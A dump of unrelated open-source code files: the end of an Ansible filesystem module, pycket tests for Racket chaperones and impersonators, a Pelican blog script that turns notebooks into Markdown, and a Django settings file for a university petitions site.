cmd = "%s -t %s %s %s '%s'" % (mkfs, fstype, force_flag, opts, dev)
rc,_,err = module.run_command(cmd)
if rc == 0:
changed = True
else:
module.fail_json(msg="Creating filesystem %s on device '%s' failed"%(fstype,dev), rc=rc, err=err)
module.exit_json(changed=changed)
# import module snippets
from ansible.module_utils.basic import *
main()
| gpl-3.0 |
pycket/pycket | pycket/test/test_impersonators.py | 4 | 23872 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from pycket.test.testhelper import *
from pycket.values import *
from pycket.impersonators import *
from pycket.values_struct import *
import pytest
import sys
sys.setrecursionlimit(10000)
def test_impersonator_properties():
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-impersonator-property 'green))
(define-struct point (x y))
(define mystruct (point 1 2))
(define mystruct^ (chaperone-struct mystruct point-x #f prop:blue 7))
(define is-blue (blue? mystruct^))
(define is-green (green? mystruct^))
(define blue-val (blue-ref mystruct^))
""")
is_blue = m.defs[W_Symbol.make("is-blue")]
is_green = m.defs[W_Symbol.make("is-green")]
blue_val = m.defs[W_Symbol.make("blue-val")]
assert is_blue is w_true
assert is_green is w_false
assert isinstance(blue_val, W_Fixnum) and blue_val.value == 7
# This test ensures the new property based on this change to Racket:
# http://git.racket-lang.org/plt/commit/0b71b8481dcf0c8eb99edf5fef9bfdfeb4f92465
def test_chaperone_struct_self_arg():
m = run_mod(
"""
#lang pycket
(struct point (x y))
(define p (point 1 2))
(define cell #f)
(define p-chap
(chaperone-struct p
point-x (lambda (self val) (set! cell self) val)))
(point-x p-chap)
""")
prox = m.defs[W_Symbol.make("p")]
chap = m.defs[W_Symbol.make("p-chap")]
cell = m.defs[W_Symbol.make("cell")]
assert isinstance(prox, W_Struct)
assert isinstance(cell, W_Cell)
assert isinstance(chap, W_ChpStruct)
self = cell.get_val()
#assert self is not prox
assert self is chap
def test_impersonate_struct_self_arg():
m = run_mod(
"""
#lang pycket
(struct point (x y) #:mutable)
(define p (point 1 2))
(define cell #f)
(define p-chap
(impersonate-struct p
point-x (lambda (self val) (set! cell self) val)))
(point-x p-chap)
""")
prox = m.defs[W_Symbol.make("p")]
chap = m.defs[W_Symbol.make("p-chap")]
cell = m.defs[W_Symbol.make("cell")]
assert isinstance(prox, W_Struct)
assert isinstance(cell, W_Cell)
assert isinstance(chap, W_ImpStruct)
self = cell.get_val()
#assert self is not prox
assert self is chap
def test_noninterposing_chaperone():
sym = W_Symbol.make
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-struct-type-property 'green 'can-impersonate))
(define a-equal+hash (list
(lambda (v1 v2 equal?)
(equal? (aa-y v1) (aa-y v2)))
(lambda (v1 hash)
(hash (aa-y v1)))
(lambda (v2 hash)
(hash (aa-y v2)))))
(define (a-impersonator-of v) (a-x v))
(define (aa-y v) (if (a? v) (a-y v) (pre-a-y v)))
(define-struct pre-a (x y)
#:property prop:equal+hash a-equal+hash
#:property prop:green 'color)
(define-struct a (x y)
#:property prop:impersonator-of a-impersonator-of
#:property prop:equal+hash a-equal+hash)
(define-struct (a-more a) (z))
(define-struct (a-new-impersonator a) ()
#:property prop:impersonator-of a-impersonator-of)
(define-struct (a-new-equal a) ()
#:property prop:equal+hash a-equal+hash)
(define a-pre-a (chaperone-struct (make-pre-a 17 1) pre-a-y (lambda (a v) v)))
(define t1 (chaperone-of? a-pre-a a-pre-a))
(define t2
(chaperone-of?
(make-pre-a 17 1)
(chaperone-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color)))
(define t3
(chaperone-of?
(make-pre-a 17 1)
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t4
(chaperone-of? a-pre-a
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t5
(chaperone-of?
(chaperone-struct a-pre-a pre-a-y #f prop:blue 'color)
a-pre-a))
(define t6
(chaperone-of?
a-pre-a
(chaperone-struct a-pre-a pre-a-y (lambda (a v) v) prop:blue 'color)))
(define t7
(chaperone-of? a-pre-a
(chaperone-struct a-pre-a green-ref (lambda (a v) v))))
(define non-interposing (chaperone-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color))
""")
assert m.defs[sym("t1")] is w_true
assert m.defs[sym("t2")] is w_true
assert m.defs[sym("t3")] is w_false
assert m.defs[sym("t4")] is w_true
assert m.defs[sym("t5")] is w_true
assert m.defs[sym("t6")] is w_false
assert m.defs[sym("t7")] is w_false
a_pre_a = m.defs[sym("a-pre-a")]
assert not a_pre_a.is_non_interposing_chaperone()
interp = m.defs[sym("non-interposing")]
assert interp.is_non_interposing_chaperone()
blue = m.defs[sym("prop:blue")]
assert isinstance(interp, W_InterposeStructBase)
assert interp.get_property(blue) == sym("color")
def test_noninterposing_impersonator():
sym = W_Symbol.make
m = run_mod(
"""
#lang pycket
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define-values (prop:green green? green-ref) (make-struct-type-property 'green 'can-impersonate))
(define a-equal+hash (list
(lambda (v1 v2 equal?)
(equal? (aa-y v1) (aa-y v2)))
(lambda (v1 hash)
(hash (aa-y v1)))
(lambda (v2 hash)
(hash (aa-y v2)))))
(define (a-impersonator-of v) (a-x v))
(define (aa-y v) (if (a? v) (a-y v) (pre-a-y v)))
(define-struct pre-a (x y)
#:mutable
#:property prop:equal+hash a-equal+hash
#:property prop:green 'color)
(define-struct a (x y)
#:mutable
#:property prop:impersonator-of a-impersonator-of
#:property prop:equal+hash a-equal+hash)
(define-struct (a-more a) (z) #:mutable)
(define-struct (a-new-impersonator a) ()
#:mutable
#:property prop:impersonator-of a-impersonator-of)
(define-struct (a-new-equal a) ()
#:mutable
#:property prop:equal+hash a-equal+hash)
(define a-pre-a (impersonate-struct (make-pre-a 17 1) pre-a-y (lambda (a v) v)))
(define t1 (impersonator-of? a-pre-a a-pre-a))
(define t2
(impersonator-of?
(make-pre-a 17 1)
(impersonate-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color)))
(define t3
(impersonator-of?
(make-pre-a 17 1)
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t4
(impersonator-of? a-pre-a
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)))
(define t5
(impersonator-of?
(impersonate-struct a-pre-a pre-a-y #f prop:blue 'color)
a-pre-a))
(define t6
(impersonator-of?
a-pre-a
(impersonate-struct a-pre-a pre-a-y (lambda (a v) v) prop:blue 'color)))
(define t7
(impersonator-of? a-pre-a
(impersonate-struct a-pre-a green-ref (lambda (a v) v))))
(define non-interposing (impersonate-struct (make-pre-a 17 1) pre-a-y #f prop:blue 'color))
""")
assert m.defs[sym("t1")] is w_true
assert m.defs[sym("t2")] is w_true
assert m.defs[sym("t3")] is w_false
assert m.defs[sym("t4")] is w_true
assert m.defs[sym("t5")] is w_true
assert m.defs[sym("t6")] is w_false
assert m.defs[sym("t7")] is w_false
a_pre_a = m.defs[sym("a-pre-a")]
assert not a_pre_a.is_non_interposing_chaperone()
interp = m.defs[sym("non-interposing")]
assert interp.is_non_interposing_chaperone()
blue = m.defs[sym("prop:blue")]
assert isinstance(interp, W_InterposeStructBase)
assert interp.get_property(blue) == sym("color")
def test_noninterposing_chaperone_procedure():
m = run_mod(
"""
#lang racket/base
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define wrapper (lambda (x) x))
(define f1 (lambda (a) a))
(define f2 (lambda (b) b))
(define f3 (lambda (c) c))
(define g1 (chaperone-procedure f1 wrapper))
(define g2 (chaperone-procedure f2 wrapper))
(define g3 (chaperone-procedure f2 wrapper))
(define t1 (chaperone-of? g1 (chaperone-procedure g1 #f prop:blue 'color)))
(define t2 (chaperone-of? g2 (chaperone-procedure g2 #f prop:blue 'color)))
(define t3 (chaperone-of? g3 (chaperone-procedure g3 #f prop:blue 'color)))
(define t4 (chaperone-of? f3 (chaperone-procedure f3 #f prop:blue 'color)))
(define t5 (chaperone-of? f3 (chaperone-procedure g3 #f prop:blue 'color)))
""")
assert m.defs[W_Symbol.make("t1")] is values.w_true
assert m.defs[W_Symbol.make("t2")] is values.w_true
assert m.defs[W_Symbol.make("t3")] is values.w_true
assert m.defs[W_Symbol.make("t4")] is values.w_true
assert m.defs[W_Symbol.make("t5")] is values.w_false
def test_noninterposing_impersonate_procedure():
m = run_mod(
"""
#lang racket/base
(define-values (prop:blue blue? blue-ref) (make-impersonator-property 'blue))
(define wrapper (lambda (x) x))
(define f1 (lambda (a) a))
(define f2 (lambda (b) b))
(define f3 (lambda (c) c))
(define g1 (impersonate-procedure f1 wrapper))
(define g2 (impersonate-procedure f2 wrapper))
(define g3 (impersonate-procedure f2 wrapper))
(define t1 (impersonator-of? g1 (impersonate-procedure g1 #f prop:blue 'color)))
(define t2 (impersonator-of? g2 (impersonate-procedure g2 #f prop:blue 'color)))
(define t3 (impersonator-of? g3 (impersonate-procedure g3 #f prop:blue 'color)))
(define t4 (impersonator-of? f3 (impersonate-procedure f3 #f prop:blue 'color)))
(define t5 (impersonator-of? f3 (impersonate-procedure g3 #f prop:blue 'color)))
""")
assert m.defs[W_Symbol.make("t1")] is values.w_true
assert m.defs[W_Symbol.make("t2")] is values.w_true
assert m.defs[W_Symbol.make("t3")] is values.w_true
assert m.defs[W_Symbol.make("t4")] is values.w_true
assert m.defs[W_Symbol.make("t5")] is values.w_false
def test_chaperone_procedure_star():
m = run_mod(
"""
#lang racket/base
(define val #f)
(define proc (lambda (x) x))
(define g
(chaperone-procedure* proc (lambda (p x) (set! val p) x)))
(g 1)
""")
proc = m.defs[W_Symbol.make("g")]
val = m.defs[W_Symbol.make("val")]
assert isinstance(val, W_Cell)
assert proc is val.get_val()
def test_chaperone_vector_stack_exhaustion():
m = run_mod(
"""
#lang racket/base
(define d
(for/fold ([v (vector 1 2 3)])
([i 1000])
(chaperone-vector v (lambda (x i val) val) (lambda (x i val) val))))
(vector-ref d 0)
""")
def test_impersonate_vector_stack_exhaustion():
m = run_mod(
"""
#lang racket/base
(define d
(for/fold ([v (vector 1 2 3)])
([i 1000])
(impersonate-vector v (lambda (x i val) val) (lambda (x i val) val))))
(vector-ref d 0)
""")
def test_chaperone_vector_to_list():
m = run_mod(
"""
#lang pycket
(define v (vector 1 2 3 4 5))
(define cell 0)
(define imp
(chaperone-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define chp
(chaperone-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define base (vector->list v))
(define lst1 (vector->list imp))
(define lst2 (vector->list chp))
(define cmp1 (equal? base lst1))
(define cmp2 (equal? base lst2))
""")
cmp1 = m.defs[W_Symbol.make("cmp1")]
cmp2 = m.defs[W_Symbol.make("cmp2")]
cell = m.defs[W_Symbol.make("cell")]
assert cmp1 is values.w_true
assert cmp2 is values.w_true
assert isinstance(cell, values.W_Cell)
count = cell.get_val()
assert isinstance(count, values.W_Fixnum) and count.value == 10
def test_impersonate_vector_to_list():
m = run_mod(
"""
#lang pycket
(define v (vector 1 2 3 4 5))
(define cell 0)
(define imp
(impersonate-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define chp
(impersonate-vector v
(lambda (self i v) (set! cell (+ cell 1)) v)
(lambda (self i v) v)))
(define base (vector->list v))
(define lst1 (vector->list imp))
(define lst2 (vector->list chp))
(define cmp1 (equal? base lst1))
(define cmp2 (equal? base lst2))
""")
cmp1 = m.defs[W_Symbol.make("cmp1")]
cmp2 = m.defs[W_Symbol.make("cmp2")]
cell = m.defs[W_Symbol.make("cell")]
assert cmp1 is values.w_true
assert cmp2 is values.w_true
assert isinstance(cell, values.W_Cell)
count = cell.get_val()
assert isinstance(count, values.W_Fixnum) and count.value == 10
def test_impersonate_procedure_application_mark():
m = run_mod(
"""
#lang racket/base
(define saved '())
(define (f x)
(call-with-immediate-continuation-mark
'z
(lambda (val)
(list val
(continuation-mark-set->list (current-continuation-marks) 'z)))))
(define g (impersonate-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 12)))
(define h (impersonate-procedure
g
(lambda (a)
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 9)))
(define i (impersonate-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
a)
impersonator-prop:application-mark
(cons 'z 11)))
(define j (impersonate-procedure
i
(lambda (a) a)
impersonator-prop:application-mark
(cons 'z 12)))
(define valid1 (equal? (g 10) '(12 (12))))
(define valid2 (equal? (h 10) '(12 (12 9))))
(define valid3 (equal? (i 10) '(11 (11))))
(define valid4 (equal? (j 10) '(11 (11))))
(define valid5 (equal? saved '(12 #f 9 #f)))
""")
valid1 = m.defs[W_Symbol.make("valid1")]
valid2 = m.defs[W_Symbol.make("valid2")]
valid3 = m.defs[W_Symbol.make("valid3")]
valid4 = m.defs[W_Symbol.make("valid4")]
valid5 = m.defs[W_Symbol.make("valid5")]
assert valid1 is w_true
assert valid2 is w_true
assert valid3 is w_true
assert valid4 is w_true
assert valid5 is w_true
def test_impersonator_of_basic(doctest):
r"""
! (require racket/base)
! (define assert (lambda (v) (unless v (error 'imp-predicates "Assertion violation"))))
! (define (sym a b) (or (chaperone-of? a b) (chaperone-of? b a)))
> (chaperone-of? 10 10)
#t
> (chaperone-of? '(10) '(10))
#t
> (impersonator-of? '(10) '(10))
#t
> (chaperone-of? '#(1 2 3) '#(1 2 3))
#t
> (impersonator-of? '#(1 2 3) '#(1 2 3))
#t
> (chaperone-of? '#&(1 2 3) '#&(1 2 3))
#t
> (impersonator-of? '#&(1 2 3) '#&(1 2 3))
#t
> (chaperone-of? (make-string 1 #\x) (make-string 1 #\x))
#f
> (impersonator-of? (make-string 1 #\x) (make-string 1 #\x))
#t
> (sym (string->immutable-string "x") (make-string 1 #\x))
#f
> (sym '#(1 2 3) (vector 1 2 3))
#f
> (sym '#&17 (box 17))
#f
> (equal? (chaperone-procedure add1 void) (chaperone-procedure add1 void))
#t
> (equal? (impersonate-procedure add1 void) (chaperone-procedure add1 void))
#t
> (equal? (chaperone-procedure add1 void) (impersonate-procedure add1 void))
#t
"""
def test_impersonator_of_structs():
m = run_mod(
"""
#lang pycket
(define assert
(lambda (v)
(unless v
(error 'imp-predicates "Assertion violation"))))
(define (chaperone-of?/impersonator a b)
(assert (impersonator-of? a b))
(chaperone-of? a b))
(define-struct o (a b))
(define-struct p (x y) #:transparent)
(define-struct (p2 p) (z) #:transparent)
(define-struct q (u [w #:mutable]) #:transparent)
(define-struct (q2 q) (v) #:transparent)
(define r1 (chaperone-of? (make-o 1 2) (make-o 1 2)))
(define r2 (impersonator-of? (make-o 1 2) (make-o 1 2)))
(define r3 (chaperone-of?/impersonator (make-p 1 2) (make-p 1 2)))
(define r4 (chaperone-of?/impersonator (make-p 1 (box 2)) (make-p 1 (box 2))))
(define r5 (chaperone-of?/impersonator (make-p2 1 2 3) (make-p2 1 2 3)))
(define r6 (chaperone-of?/impersonator (make-q 1 2) (make-q 1 2)))
(define r7 (chaperone-of?/impersonator (make-q2 1 2 3) (make-q2 1 2 3)))
""")
r1 = m.defs[W_Symbol.make("r1")]
r2 = m.defs[W_Symbol.make("r2")]
r3 = m.defs[W_Symbol.make("r3")]
r4 = m.defs[W_Symbol.make("r4")]
r5 = m.defs[W_Symbol.make("r5")]
r6 = m.defs[W_Symbol.make("r6")]
r7 = m.defs[W_Symbol.make("r7")]
assert r1 is w_false
assert r2 is w_false
assert r3 is w_true
assert r4 is w_false
assert r5 is w_true
assert r6 is w_false
assert r7 is w_false
def test_chaperone_procedure_application_mark():
m = run_mod(
"""
#lang racket/base
(define saved '())
(define (f x)
(call-with-immediate-continuation-mark
'z
(lambda (val)
(list val
(continuation-mark-set->list (current-continuation-marks) 'z)))))
(define g (chaperone-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 12)))
(define h (chaperone-procedure
g
(lambda (a)
(values (lambda (r) r)
a))
impersonator-prop:application-mark
(cons 'z 9)))
(define i (chaperone-procedure
f
(lambda (a)
(set! saved (cons (continuation-mark-set-first #f 'z)
saved))
a)
impersonator-prop:application-mark
(cons 'z 11)))
(define j (chaperone-procedure
i
(lambda (a) a)
impersonator-prop:application-mark
(cons 'z 12)))
(define valid1 (equal? (g 10) '(12 (12))))
(define valid2 (equal? (h 10) '(12 (12 9))))
(define valid3 (equal? (i 10) '(11 (11))))
(define valid4 (equal? (j 10) '(11 (11))))
(define valid5 (equal? saved '(12 #f 9 #f)))
""")
valid1 = m.defs[W_Symbol.make("valid1")]
valid2 = m.defs[W_Symbol.make("valid2")]
valid3 = m.defs[W_Symbol.make("valid3")]
valid4 = m.defs[W_Symbol.make("valid4")]
valid5 = m.defs[W_Symbol.make("valid5")]
assert valid1 is w_true
assert valid2 is w_true
assert valid3 is w_true
assert valid4 is w_true
assert valid5 is w_true
def test_application_mark_propagation():
m = run_mod(
u"""
#lang racket/base
(define msgs '())
(define f
(chaperone-procedure
(λ (x) 'wrong)
(λ (x)
(call-with-immediate-continuation-mark
'key
(λ (m)
(set! msgs (cons m msgs))
(values x))))
impersonator-prop:application-mark
(cons 'key 'skip-this-check)))
(void ((chaperone-procedure f (lambda (x) x)) 42)
(f 42))
(define r (equal? msgs '(#f #f)))
""")
r = m.defs[W_Symbol.make("r")]
assert r is w_true
def test_chaperone_vector_to_immutable_vector(doctest):
u"""
! (define v (vector 1 2 3 4 5))
! (define cell '())
! (define v^ (chaperone-vector v (λ (self i val) (set! cell (append cell (list i))) val) (λ (self i val) val)))
> (vector->immutable-vector v^)
#(1 2 3 4 5)
> cell
'(0 1 2 3 4)
"""
def test_rfindler_impersonator_examples(doctest):
ur"""
! (require racket/base)
! (define (add15 x) (+ x 15))
! (define store '())
! (define (clear) (let ([v store]) (begin (set! store '()) v)))
! (define (printf^ fmt . args) (set! store (append store (list (apply format fmt args)))))
! (define add15+print (impersonate-procedure add15 (λ (x) (printf^ "called with ~s" x) (values (λ (res) (printf^ "returned ~s" res) res) x))))
! (define-values (imp-prop:p1 imp-prop:p1? imp-prop:p1-get) (make-impersonator-property 'imp-prop:p1))
! (define-values (imp-prop:p2 imp-prop:p2? imp-prop:p2-get) (make-impersonator-property 'imp-prop:p2))
! (define add15.2 (impersonate-procedure add15 #f imp-prop:p1 11))
! (define add15.3 (impersonate-procedure add15.2 #f imp-prop:p2 13))
! (define add15.4 (impersonate-procedure add15.3 #f imp-prop:p1 101))
> (add15 27)
42
> (add15+print 27)
42
> (clear)
'("called with 27" "returned 42")
> (add15.2 2)
17
> (imp-prop:p1? add15.2)
#t
> (imp-prop:p1-get add15.2)
11
> (imp-prop:p2? add15.2)
#f
> (add15.3 3)
18
> (imp-prop:p1? add15.3)
#t
> (imp-prop:p1-get add15.3)
11
> (imp-prop:p2? add15.3)
#t
> (imp-prop:p2-get add15.3)
13
> (add15.4 4)
19
> (imp-prop:p1? add15.4)
#t
> (imp-prop:p1-get add15.4)
101
> (imp-prop:p2? add15.4)
#t
> (imp-prop:p2-get add15.4)
13
"""
def test_impersonate_procedure_callable_struct():
m = run_mod(
"""
#lang racket/kernel
(#%require racket/private/define
racket/private/small-scheme
racket/private/more-scheme)
(define-values (struct:keyword-procedure mk-kw-proc keyword-procedure?
keyword-procedure-ref keyword-procedure-set!)
(make-struct-type 'keyword-procedure #f 4 0 #f
(list (cons prop:checked-procedure #t))
(current-inspector)
#f
'(0 1 2 3)))
(define-values (struct:okp make-optional-keyword-procedure okp? okp-ref okp-set!)
(make-struct-type 'procedure
struct:keyword-procedure
1 0 #f
(list)
(current-inspector) 0))
(define v5 (make-optional-keyword-procedure #f #f null '(#:x) #f))
(define cv2 (chaperone-procedure v5 void))
(define result (keyword-procedure? cv2))
""")
assert m.defs[W_Symbol.make("result")] is w_true
def test_impersonate_procedure_callable_struct2(doctest):
u"""
! (require racket/private/kw)
! (struct annotated-proc (base note) #:property prop:procedure (struct-field-index base))
! (define example (annotated-proc (λ (x) x) "The identity function"))
! (define imp (impersonate-procedure example add1))
! (define imp2 (chaperone-struct example annotated-proc-note (λ (self x) x)))
> (imp 5)
6
> (annotated-proc-note example)
"The identity function"
> (annotated-proc-note imp)
"The identity function"
> (eq? (annotated-proc-note example) (annotated-proc-note imp))
#t
> (eq? (annotated-proc-note example) (annotated-proc-note imp2))
#t
"""
| mit |
schryer/schryer_pelican_blog | add_links.py | 1 | 6919 | # -*- coding: utf-8 -*-
import os
import glob
import argparse
def make_argument_parser():
'''Returns argument parser for this script.
'''
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter,
description='''
This script adds links to each markdown file in the blog
========================================================
Each markdown file in stubs/ is converted and written to output/
''')
fg = parser.add_argument_group('Flag parameters')
fg.add_argument('--clean', action='store_true',
dest='clean_generated_files',
default=False,
help='If True, the generated Markdown files are removed. If False, they are generated.')
return parser
def convert_ipynb_file_to_stub(ipynb_path):
generation_directory = 'stubs/notebooks/generated/'
generated_path = ipynb_path.replace('stubs/notebooks/', generation_directory).replace('.ipynb', '_GENERATED_by_add_links.ipynb')
generated_md_path = generated_path.replace('.ipynb', '.md')
stub_md_path = generated_path.replace('.ipynb', '_stub.md')
final_md_path = stub_md_path.replace(generation_directory, 'content/')
# Copy original files to generated directory
original_meta_path = ipynb_path.replace('.ipynb', '.ipynb-meta')
generated_meta_path = generated_path.replace('.ipynb', '.ipynb-meta')
cmd = 'cp {} {}'.format(original_meta_path, generated_meta_path)
print('Executing: {}'.format(cmd))
os.system(cmd)
cmd = 'cp {} {}'.format(ipynb_path, generated_path)
print('Executing: {}'.format(cmd))
os.system(cmd)
# Convert ipynb files within generated directory
support_path = generated_path.replace('.ipynb', '_files')
support_directory = os.path.split(support_path)[-1]
generated_filename = os.path.split(generated_path)[-1]
cwd = os.getcwd()
print('Changing working directory to: {}'.format(generation_directory))
os.chdir(generation_directory)
cmd = 'ipython nbconvert --to markdown {}'.format(generated_filename)
print('Executing: {}'.format(cmd))
os.system(cmd)
print('Changing working directory back to: {}'.format(cwd))
os.chdir(cwd)
# A: Write final .md file and B: move support files to images directory
glob_str = '{}/*'.format(support_path)
support_files = glob.glob(glob_str)
# A: Write final .md file
print('Reading generated Markdown file: {}'.format(generated_md_path))
with open(generated_md_path, 'r') as f:
md_lines = f.readlines()
print('Reading: {}'.format(generated_meta_path))
with open(generated_meta_path, 'r') as f:
meta_lines = f.readlines()
print('Writing stub Markdown file: {}'.format(stub_md_path))
support_files_found = []
with open(stub_md_path, 'w') as f:
for line in meta_lines:
f.write(line)
for line_number, line in enumerate(md_lines):
if len(line.split(support_directory)) > 1:
line = line.replace(support_directory, 'images')
found = False
for support_file in support_files:
base_filename = os.path.split(support_file)[-1]
if len(line.split(base_filename)) > 1:
print('Replacing support file {} on Markdown line {} to: {}'.format(base_filename, line_number, line))
support_files_found.append(support_file)
found = True
if not found:
raise Exception('Something is wrong with this support file reference on line number {}'.format(line_number),
(line, support_directory))
f.write(line)
if len(support_files_found) != len(support_files):
raise Exception('Not all support files were found.', (support_files, support_files_found, generated_path))
# C: move support files to images directory
for support_file in support_files:
base_filename = os.path.split(support_file)[-1]
image_filename = 'content/images/{}'.format(base_filename)
cmd = 'cp {} {}'.format(support_file, image_filename)
print('Moving supporting image using: {}'.format(cmd))
os.system(cmd)
return stub_md_path, final_md_path
def make_content_file_from_stub(stub_filename, generated_filename, link_filename='external_links.md'):
print('Reading stub file: {}'.format(stub_filename))
with open(stub_filename, 'r') as f:
stub_lines = f.readlines()
print('Reading link file: {}'.format(link_filename))
with open(link_filename, 'r') as f:
link_lines = f.readlines()
print('Adding links and making content file: {}'.format(generated_filename))
with open(generated_filename, 'w') as f:
for line in stub_lines + ['\n', '\n'] + link_lines:
f.write(line)
def process_arguments(args):
markdown_files = glob.glob('stubs/*.md') + glob.glob('stubs/pages/*.md')
ipynb_files = glob.glob('stubs/notebooks/*.ipynb')
ipynb_meta_files = glob.glob('stubs/notebooks/*.ipynb-meta')
generated_files = glob.glob('content/*_GENERATED_by_add_links.md') \
+ glob.glob('content/pages/*_GENERATED_by_add_links.md') \
+ glob.glob('content/notebooks/*_GENERATED_by_add_links.ipynb')
if args.clean_generated_files:
for gfn in generated_files:
print('Removing generated file: {}'.format(gfn))
os.remove(gfn)
else:
for stub in markdown_files:
generated_filename = stub.replace('stubs/', 'content/').replace('.md', '_GENERATED_by_add_links.md')
make_content_file_from_stub(stub, generated_filename)
converted_ipynb_files = []
for meta_file in ipynb_meta_files:
ipynb_file = meta_file.replace('.ipynb-meta', '.ipynb')
if ipynb_file not in ipynb_files:
print('WARNING: An IPython notebook metadata file was found without its partner: {}'.format(meta_file))
continue
stub_path, final_path = convert_ipynb_file_to_stub(ipynb_file)
make_content_file_from_stub(stub_path, final_path)
converted_ipynb_files.append(ipynb_file)
# Check if all IPython notebook files had metadata files:
for ipynb_file in ipynb_files:
if ipynb_file not in converted_ipynb_files:
print('WARNING: An IPython notebook file was found without its partner IPython notebook metadata file: {}'.format(ipynb_file))
if __name__ == '__main__':
p = make_argument_parser()
args = p.parse_args()
process_arguments(args)
| cc0-1.0 |
kpi-petitions/project-y | kpiedemocracy/settings.py | 1 | 4892 | """
Django settings for kpiedemocracy project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '-&gy3@3kmu2c$195q1p_7*e=-f2_u50-w6n7h*-cd-widwi3%b'
DEBUG = os.environ.get('DEBUG', 'True') == 'True'
ALLOWED_HOSTS = []
SITE_ID = 2
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'allauth',
'allauth.account',
'rest_auth.registration',
'allauth.socialaccount',
'allauth.socialaccount.providers.facebook',
'allauth.socialaccount.providers.vk',
'petitions',
'rest_framework_swagger',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'kpiedemocracy.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request'
],
},
},
]
WSGI_APPLICATION = 'kpiedemocracy.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'console': {
'class': 'logging.StreamHandler',
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
},
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')
STATIC_URL = '/static/'
STATICFILES_DIRS = ("ui-dist",)
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': ('rest_framework.permissions.IsAdminUser',),
'PAGE_SIZE': 10,
'DEFAULT_FILTER_BACKENDS': ('rest_framework.filters.DjangoFilterBackend',)
}
FILE_UPLOAD_HANDLERS = ["django.core.files.uploadhandler.MemoryFileUploadHandler"]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
APPEND_SLASH = True
LOGIN_REDIRECT_URL = '/'
SOCIALACCOUNT_QUERY_EMAIL = True
SOCIALACCOUNT_PROVIDERS = {
'facebook': {
'SCOPE': ['email'],
'METHOD': 'js_sdk',
'VERIFIED_EMAIL': True,
'FIELDS': [
'id',
'email',
'name',
'first_name',
'last_name'
]
}
}
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_USERNAME_REQUIRED = True
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# == HEROKU SETTINGS ==
# Parse database configuration from $DATABASE_URL
import dj_database_url
if dj_database_url.config():
DATABASES['default'] = dj_database_url.config()
# Honor the 'X-Forwarded-Proto' header for request.is_secure()
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
